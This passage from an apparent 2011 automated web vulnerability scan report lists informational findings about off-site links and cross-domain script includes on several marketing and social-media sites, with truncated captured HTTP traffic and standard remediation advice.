http://webcache.googleusercontent.com/search?q=cache:xKmsx6mWMfkJ:thinkofit.com/webconf/forumsoft.htm+ip+board+software&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com
http://www.123flashchat.com/ipb_chat.html
http://www.forum-software.org/tag/ipboard
http://www.invisionpower.com/
http://www.invisionpower.com/hosting/
http://www.invisionpower.com/products/blog/
http://www.invisionpower.com/products/board/
http://www.invisionpower.com/products/board/features/
http://www.invisionpower.com/products/board/purchase.php
http://www.invisionpower.com/products/gallery/
http://www.invisionpower.com/store/index.php
http://www.julong.com.cn/en/News/188.html
http://www.youtube.com/results?q=ip+board+software&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?sourceid=chrome&ie=UTF-8&q=ip+board+software HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=b4ccbc578566f743:FF=0:TM=1305295666:LM=1305298565:S=ky1WAdlUDHsxJ4Yj; NID=47=a2WEVV1pGyLhyzX0eoyN4112Szbl5bsuUuXxvplDzxL5iTKqoNP1PX_CW9GigJ-rF89o0HmEaBAsnNxGYLXTFSFUaLSafQW5LDzXiCTk9VqmvR_H7O1dB7XZ5-UALZuy

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:25:51 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/vD843DpA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 83299

<!doctype html> <head> <title>ip board software - Google Search</title> <script>window.google={kEI:"j_7PTemMEMji0QGchLH2DQ",kEXPI:"17259,23756,24692,24878,24879,25907,27400,28505,29229,29685,29
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=ip+board+software&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.invisionpower.com/products/board/" class=l onmousedown="return clk(this.href,'','','','1','','0CCAQFjAA')">Community Forum <em>
...[SNIP]...
<div class=osl><a href="http://www.invisionpower.com/products/board/purchase.php" onmousedown="return clk(this.href,'','','','1','','0CCcQ0gIoADAA')">Purchase IP.Board 3</a> - <a href="http://www.invisionpower.com/products/board/features/" onmousedown="return clk(this.href,'','','','1','','0CCgQ0gIoATAA')">Features</a> - <a href="http://www.invisionpower.com/store/index.php" onmousedown="return clk(this.href,'','','','1','','0CCkQ0gIoAjAA')">Store</a> - <a href="http://www.invisionpower.com/hosting/" onmousedown="return clk(this.href,'','','','1','','0CCoQ0gIoAzAA')">Hosted Communities</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:efdVqbelowMJ:www.invisionpower.com/products/board/+ip+board+software&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CCUQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.invisionpower.com/" class=l onmousedown="return clk(this.href,'','','','2','','0CCwQFjAB')">Community & Forum <em>
...[SNIP]...
<div class=osl><a href="http://community.invisionpower.com/" onmousedown="return clk(this.href,'','','','2','','0CDMQ0gIoADAB')">Support Forums</a> - <a href="http://www.invisionpower.com/products/board/" onmousedown="return clk(this.href,'','','','2','','0CDQQ0gIoATAB')">IP.Board</a> - <a href="http://community.invisionpower.com/resources/" onmousedown="return clk(this.href,'','','','2','','0CDUQ0gIoAjAB')">Resources</a> - <a href="http://community.invisionpower.com/resources/official.html" onmousedown="return clk(this.href,'','','','2','','0CDYQ0gIoAzAB')">Documentation</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:7ETs2caA0eMJ:www.invisionpower.com/+ip+board+software&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CDEQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.invisionpower.com/products/blog/" class=l onmousedown="return clk(this.href,'','','','3','','0CDgQFjAC')">IP.Blog - Integrated Blog <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:PmlRsuZTAsUJ:www.invisionpower.com/products/blog/+ip+board+software&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CD0QIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.invisionpower.com/products/gallery/" class=l onmousedown="return clk(this.href,'','','','4','','0CD8QFjAD')">IP.Gallery - Integrated Gallery <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:76X_ncmJly8J:www.invisionpower.com/products/gallery/+ip+board+software&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CEQQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Invision_Power_Board" class=l onmousedown="return clk(this.href,'','','','5','','0CEcQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:L3-QgO6ibUgJ:en.wikipedia.org/wiki/Invision_Power_Board+ip+board+software&cd=5&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CEwQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.forum-software.org/tag/ipboard" class=l onmousedown="return clk(this.href,'','','','6','','0CE4QFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:qnHi427Jq2oJ:www.forum-software.org/tag/ipboard+ip+board+software&cd=6&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CFUQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://ipboard-software.software.informer.com/" class=l onmousedown="return clk(this.href,'','','','7','','0CFcQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:rwIJ10wJfloJ:ipboard-software.software.informer.com/+ip+board+software&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CFwQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://thinkofit.com/webconf/forumsoft.htm" class=l onmousedown="return clk(this.href,'','','','8','','0CF4QFjAH')">Forum <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:xKmsx6mWMfkJ:thinkofit.com/webconf/forumsoft.htm+ip+board+software&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CGMQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.123flashchat.com/ipb_chat.html" class=l onmousedown="return clk(this.href,'','','','9','','0CGUQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:V7ycC9DTf5gJ:www.123flashchat.com/ipb_chat.html+ip+board+software&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CGoQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.julong.com.cn/en/News/188.html" class=l onmousedown="return clk(this.href,'','','','10','','0CGwQFjAJ')">Release of <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:6zPAbdiM6HsJ:www.julong.com.cn/en/News/188.html+ip+board+software&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CHEQIDAJ')">Cached</a>
...[SNIP]...

16.6. http://www.hubspot.com/ebooks/facebook-page-marketing-ebook-2011/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hubspot.com
Path:	/ebooks/facebook-page-marketing-ebook-2011/

Issue detail

The page was loaded from a URL containing a query string:

http://www.hubspot.com/ebooks/facebook-page-marketing-ebook-2011/?source=hspd-InsideFacebook-200x200ad-201104

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=HubSpot,+25+First+Street,+Cambridge,+MA+02141&aq=0&sll=42.347876,-71.039219&sspn=0.005392,0.012424&ie=UTF8&hq=HubSpot,&hnear=25+1st+St,+Cambridge,+Middlesex,+Massachusetts+02141&z=15
http://socialfresh.com/
http://twitter.com/
http://twitter.com/home?status=Behind%20on%20Recent%20Facebook%20Changes?%20Download%20@HubSpot%27s%20New%20ebook%20for%20Updates:%20http%3A%2F%2Fbit.ly/gRYRCd%20%23FBbiz
http://www.facebook.com/share.php?u=http://www.hubspot.com/ebooks/facebook-page-marketing-ebook-2011/
http://www.linkedin.com/shareArticle?mini=true&url=http://www.hubspot.com/ebooks/facebook-page-marketing-ebook-2011/
https://www.conversionruler.com/bin/tracker.php?siteid=4630&nojs=1

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33245
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=iU_iZ7JJzAEkAAAAOGY4OWQ2YWQtZWU2NC00NGY2LTkwODgtZDdjNzJkZGIxMjhk0; expires=Sun, 24-Jul-2011 03:33:08 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=cvd0uq55y0oey1ny43dqhtu0; path=/; HttpOnly
Date: Sun, 15 May 2011 16:53:08 GMT
Connection: close
Set-Cookie: HUBSPOT130=68228268.20480.0000; path=/

<!DOCTYPE html>

<html>
<head id="Head">

<script type="text/javascript">
//<![CDATA[
window.hubspot={splitTimes:{preHead:new Date()}};
//]]>
</script>
<meta id="Me
...[SNIP]...
</a>, provided by HubSpot and <a title="Social Fresh" href="http://socialfresh.com/" target="_self">Social Fresh</a>. In it, you will read insights from leading social media experts, <a title="Jason Keath" href="http://twitter.com/#%21/jakrose" target="_self">Jason Keath</a>, founder of Social Fresh, <a title="Justin Kistner" href="http://twitter.com/#%21/justinkistner" target="_self">Justin Kistner</a>, Senior Manager of Social Media Marketing for Webtrends, <a title="Ellie Mirman" href="http://twitter.com/#%21/ellieeille" target="_self">Ellie Mirman</a>, Inbound Marketing Manager at HubSpot and <a title="Justin Levy" href="http://twitter.com/#%21/justinlevy" target="_self">Justin Levy</a>
...[SNIP]...
<div style="border: medium none; overflow: hidden; color: #000000; background-color: transparent; text-align: left; text-decoration: none;"><a href="http://twitter.com/home?status=Behind%20on%20Recent%20Facebook%20Changes?%20Download%20@HubSpot%27s%20New%20ebook%20for%20Updates:%20http%3A%2F%2Fbit.ly/gRYRCd%20%23FBbiz" target="_self"><img src="../../Portals/53/images/tweet_this_T.png" border="0" alt="" hspace="0" vspace="0" align="none" />
...[SNIP]...
</a>  <a href="http://www.facebook.com/share.php?u=http://www.hubspot.com/ebooks/facebook-page-marketing-ebook-2011/" target="_new"><img src="../../Portals/53/images/facebook.gif" border="0" alt="" hspace="0" vspace="0" align="none" />
...[SNIP]...
</a>  <a href="http://www.linkedin.com/shareArticle?mini=true&url=http://www.hubspot.com/ebooks/facebook-page-marketing-ebook-2011/" target="_new"><img src="../../Portals/53/images/linkedin.jpeg" border="0" alt="" hspace="0" vspace="0" align="none" />
...[SNIP]...
<br />
Cambridge, MA 02141
<a class="mapLink" href="http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=HubSpot,+25+First+Street,+Cambridge,+MA+02141&aq=0&sll=42.347876,-71.039219&sspn=0.005392,0.012424&ie=UTF8&hq=HubSpot,&hnear=25+1st+St,+Cambridge,+Middlesex,+Massachusetts+02141&z=15">View On Google Maps</a>
...[SNIP]...
</script>

<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<div style="position: absolute; left: 0"><img
src="https://www.conversionruler.com/bin/tracker.php?siteid=4630&nojs=1" alt="" width="1" height="1"
/></div>
...[SNIP]...

16.7. http://www.hubspot.com/free-trial/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hubspot.com
Path:	/free-trial/Default.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.hubspot.com/free-trial/Default.aspx?RewriteStatus=1

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=HubSpot,+25+First+Street,+Cambridge,+MA+02141&aq=0&sll=42.347876,-71.039219&sspn=0.005392,0.012424&ie=UTF8&hq=HubSpot,&hnear=25+1st+St,+Cambridge,+Middlesex,+Massachusetts+02141&z=15
http://www.youtube.com/v/m0UQucWM0Zw?fs=1&hl=en_US
https://www.conversionruler.com/bin/tracker.php?siteid=4630&nojs=1

Request

POST /free-trial/Default.aspx?RewriteStatus=1 HTTP/1.1
Host: www.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.hubspot.com/free-trial/
Cache-Control: max-age=0
Origin: http://www.hubspot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykJkFVZghDZIdS8Uv
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=bce5Z7JJzAEkAAAAMTA2NDMzOTEtOGY4Yi00Y2E0LTk5N2UtN2RmMjAwOWM0Mjc20; ASP.NET_SessionId=n2pxct2tag4iwgih2alnl545; HUBSPOT130=68228268.20480.0000; hubspotutktzo=-5; hubspotutk=a3ef224db6434804a3e24ca05d84f49f; hubspotvd=a3ef224db6434804a3e24ca05d84f49f; hubspotvw=a3ef224db6434804a3e24ca05d84f49f; hubspotvm=a3ef224db6434804a3e24ca05d84f49f; hsfirstvisit=http%3A%2F%2Fwww.hubspot.com%2Febooks%2Ffacebook-page-marketing-ebook-2011%2F%3Fsource%3Dhspd-InsideFacebook-200x200ad-201104|http%3A%2F%2Fwww.insidefacebook.com%2F|2011-05-15%2012%3A53%3A12; CR_4630_0=E1EF0BD5C395C5FF; hubspotdt=2011-05-15%2012%3A54%3A29; __ar_v4=YBTCZKMLVJGNJKSIKUO3HL%3A20110514%3A1%7CYNYIFZAM3NACFPVLCC56LA%3A20110514%3A2%7CSNWCKNCH3JFBBA3BHHHZOL%3A20110514%3A2%7CWU5STEO2IBFPDJIARLWYYE%3A20110514%3A1
Content-Length: 8703

------WebKitFormBoundarykJkFVZghDZIdS8Uv
Content-Disposition: form-data; name="__VIEWSTATE"

/wEPDwULLTEyNDEwNzkwMjkPZBYGZg8WAh4EVGV4dAUPPCFET0NUWVBFIGh0bWw+ZAIBD2QWDgIBDxYCHgdWaXNpYmxlaGQCAg8WAh4H
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40511
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Sun, 15 May 2011 16:54:34 GMT
Connection: close

<!DOCTYPE html>

<html>
<head id="Head">

<script type="text/javascript">
//<![CDATA[
window.hubspot={splitTimes:{preHead:new Date()}};
//]]>
</script>
<meta id="Me
...[SNIP]...
<div class="ISContent Normal" id="IngeniContentBlock_75314">
<object style="display: block; margin-left: auto; margin-right: auto;" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="200" height="137" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0">
<param name="allowFullScreen" value="true" />
...[SNIP]...
<param name="allowfullscreen" value="true" /><embed style="display: block; margin-left: auto; margin-right: auto;" type="application/x-shockwave-flash" width="200" height="137" src="http://www.youtube.com/v/m0UQucWM0Zw?fs=1&hl=en_US" allowscriptaccess="always" allowfullscreen="true"></embed>
...[SNIP]...
<br />
Cambridge, MA 02141
<a class="mapLink" href="http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=HubSpot,+25+First+Street,+Cambridge,+MA+02141&aq=0&sll=42.347876,-71.039219&sspn=0.005392,0.012424&ie=UTF8&hq=HubSpot,&hnear=25+1st+St,+Cambridge,+Middlesex,+Massachusetts+02141&z=15">View On Google Maps</a>
...[SNIP]...
</script>

<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<div style="position: absolute; left: 0"><img
src="https://www.conversionruler.com/bin/tracker.php?siteid=4630&nojs=1" alt="" width="1" height="1"
/></div>
...[SNIP]...

16.8. http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rightscale.com
Path:	/lp/social-gaming-screencast-vip-trial.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php?ls=Advertising%2FSponsorship&sd=InsideFacebook&campaign=70170000000ftey&campaign_status=Responded&utm_source=InsideFacebook&utm_medium=banner&utm_content=200x200&utm_campaign=SocialGaming

The response contains the following links to other domains:

http://munchkin.marketo.net/munchkin.js
http://www.twitter.com/rightscale

Request

GET /lp/social-gaming-screencast-vip-trial.php?ls=Advertising%2FSponsorship&sd=InsideFacebook&campaign=70170000000ftey&campaign_status=Responded&utm_source=InsideFacebook&utm_medium=banner&utm_content=200x200&utm_campaign=SocialGaming HTTP/1.1
Host: www.rightscale.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

16.9. http://www.shoutlet.com/features/landingpage.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shoutlet.com
Path:	/features/landingpage.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.shoutlet.com/features/landingpage.php?utm_source=insidefacebook&utm_medium=display&utm_content=powerfb&utm_campaign=q211

The response contains the following links to other domains:

http://www.facebook.com/shoutlet
http://www.twitter.com/shoutlet
https://www.google.com/jsapi?key=ABQIAAAAJdFw8dN_ryYXdjrd_6La7xRxKkcOD6j2nK9jRjo3eYM4aCYXPhTCYCsZKkIXfjnUJKWU9uksXx3OtA

Request

GET /features/landingpage.php?utm_source=insidefacebook&utm_medium=display&utm_content=powerfb&utm_campaign=q211 HTTP/1.1
Host: www.shoutlet.com
Proxy-Connection: keep-alive
Referer: http://www.insidefacebook.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:11:28 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Content-Length: 7888
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Power Your Brand on
...[SNIP]...
</style>
<script type="text/javascript" src="https://www.google.com/jsapi?key=ABQIAAAAJdFw8dN_ryYXdjrd_6La7xRxKkcOD6j2nK9jRjo3eYM4aCYXPhTCYCsZKkIXfjnUJKWU9uksXx3OtA"></script>
...[SNIP]...
<span style="margin: 10px 5px 0 0; vertical-align:top;"><a href="http://www.facebook.com/shoutlet" title="visit us on facebook"><img src="../static/img/ui/fb_sm_icon.png" height="25px" alt="facebook icon"/>
...[SNIP]...
<span style="margin: 10px 0px 0 0; vertical-align:top;"><a href="http://www.twitter.com/shoutlet" title="visit us on twitter"><img src="../static/img/ui/twitter_sm_icon.png" height="25px" alt="twitter icon"/>
...[SNIP]...

16.10. http://www.votigo.com/corp/solutions/fbcontests.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.votigo.com
Path:	/corp/solutions/fbcontests.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.votigo.com/corp/solutions/fbcontests.php?insidefacebook

The response contains the following links to other domains:

http://twitter.com/share?url=http://www.votigo.com/corp/solutions/fbcontests.php?insidefacebook&text=Check%20out%20%40votigo%20for%20video%20contest%2C%20facebook%20contest%2C%20twitter%20contest%2C%20sweepstakes%20%26%20social%20media%20promotions.%20%23contest&related=votigo
http://twitter.com/votigo
http://www.facebook.com/pages/Lafayette-CA/Votigo-Social-Media-Solutions/30234388700
http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.votigo.com&layout=button_count&show_faces=false&width=170&action=like&font=lucida+grande&colorscheme=light&height=27
http://www.facebook.com/share.php?u=http://www.votigo.com/corp/solutions/fbcontests.php?insidefacebook&t=Votigo creates viral and engaging photo and video contests, sweepstakes, and promotions that drive measurable results for our clients.

Request

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=NJMZMZS192.168.1.180CKMLK; path=/
Date: Sun, 15 May 2011 16:53:13 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Facebook Contes
...[SNIP]...
<div class="fbtabs"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.votigo.com&layout=button_count&show_faces=false&width=170&action=like&font=lucida+grande&colorscheme=light&height=27" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:170px; height:27px;" allowTransparency="true"></iframe>
...[SNIP]...
<li>
<a href="http://twitter.com/votigo" target="_blank"><img src="/corp/img/twit.gif" border="0" width="16" height="16" alt="t" class="virallinks" />
...[SNIP]...
</a> |
<a href="http://twitter.com/share?url=http://www.votigo.com/corp/solutions/fbcontests.php?insidefacebook&text=Check%20out%20%40votigo%20for%20video%20contest%2C%20facebook%20contest%2C%20twitter%20contest%2C%20sweepstakes%20%26%20social%20media%20promotions.%20%23contest&related=votigo" target="_blank">Share</a>
...[SNIP]...
<li class="lastlink">
<a href="http://www.facebook.com/pages/Lafayette-CA/Votigo-Social-Media-Solutions/30234388700" target="_blank"><img src="/corp/img/h-ic-2a.gif" border="0" width="18" height="18" alt="f" class="virallinks" />
...[SNIP]...
</a> |
<a target="_blank" href="http://www.facebook.com/share.php?u=http://www.votigo.com/corp/solutions/fbcontests.php?insidefacebook&t=Votigo creates viral and engaging photo and video contests, sweepstakes, and promotions that drive measurable results for our clients.">Share</a>
...[SNIP]...

17. Cross-domain script include previous next
There are 18 instances of this issue:

http://community.invisionpower.com/blog/2568/entry-6080-social-groups-100-beta-released/
http://my.lifestreetmedia.com/login/register/
http://www.facebook.com/plugins/like.php
http://www.hubspot.com/
http://www.hubspot.com/ebooks/facebook-page-marketing-ebook-2011/
http://www.hubspot.com/free-trial/
http://www.hubspot.com/free-trial/Default.aspx
http://www.hubspot.com/portals/53/skins/hubspot/search.html
http://www.insidefacebook.com/
http://www.insidemobileapps.com/2011/05/09/monday-mobile-roundup-rovio-ipo-capcom-mobile-revenue-paperphone/
http://www.insidemobileapps.com/2011/05/09/wp-includes/js/thickbox/loadingAnimation.gif
http://www.insidemobileapps.com/advertise-with-us/
http://www.lifestreetmedia.com/
http://www.rightscale.com/index.php
http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php
http://www.shoutlet.com/
http://www.shoutlet.com/features/landingpage.php
http://www.votigo.com/corp/img/panel.jpg

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

17.1. http://community.invisionpower.com/blog/2568/entry-6080-social-groups-100-beta-released/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.invisionpower.com
Path:	/blog/2568/entry-6080-social-groups-100-beta-released/

Issue detail

The response dynamically includes the following script from another domain:

http://platform.twitter.com/widgets.js

Request

Response

17.2. http://my.lifestreetmedia.com/login/register/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://my.lifestreetmedia.com
Path:	/login/register/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/recaptcha/api/challenge?k=6LcOb8ESAAAAAJa5wRLuI_5kPjznl10EqXhZcVzB

Request

Response

17.3. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js

Request

Response

17.4. http://www.hubspot.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hubspot.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js

Request

GET / HTTP/1.1
Host: www.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.hubspot.com/ebooks/facebook-page-marketing-ebook-2011/?source=hspd-InsideFacebook-200x200ad-201104
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=bce5Z7JJzAEkAAAAMTA2NDMzOTEtOGY4Yi00Y2E0LTk5N2UtN2RmMjAwOWM0Mjc20; ASP.NET_SessionId=n2pxct2tag4iwgih2alnl545; HUBSPOT130=68228268.20480.0000; hubspotutktzo=-5; CR_4630_0=7DF0172E18A4DAA2; hubspotdt=2011-05-15%2012%3A53%3A12; hubspotutk=a3ef224db6434804a3e24ca05d84f49f; hubspotvd=a3ef224db6434804a3e24ca05d84f49f; hubspotvw=a3ef224db6434804a3e24ca05d84f49f; hubspotvm=a3ef224db6434804a3e24ca05d84f49f; hsfirstvisit=http%3A%2F%2Fwww.hubspot.com%2Febooks%2Ffacebook-page-marketing-ebook-2011%2F%3Fsource%3Dhspd-InsideFacebook-200x200ad-201104|http%3A%2F%2Fwww.insidefacebook.com%2F|2011-05-15%2012%3A53%3A12; __ar_v4=%7CSNWCKNCH3JFBBA3BHHHZOL%3A20110514%3A1%7CYNYIFZAM3NACFPVLCC56LA%3A20110514%3A1%7CYBTCZKMLVJGNJKSIKUO3HL%3A20110514%3A1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25220
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Sun, 15 May 2011 16:54:25 GMT
Connection: close

<!DOCTYPE html>

<html>
<head id="Head">

<script type="text/javascript">
//<![CDATA[
window.hubspot={splitTimes:{preHead:new Date()}};
//]]>
</script>
<meta id="Me
...[SNIP]...
</script>

<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

17.5. http://www.hubspot.com/ebooks/facebook-page-marketing-ebook-2011/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hubspot.com
Path:	/ebooks/facebook-page-marketing-ebook-2011/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js

Request

Response

17.6. http://www.hubspot.com/free-trial/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hubspot.com
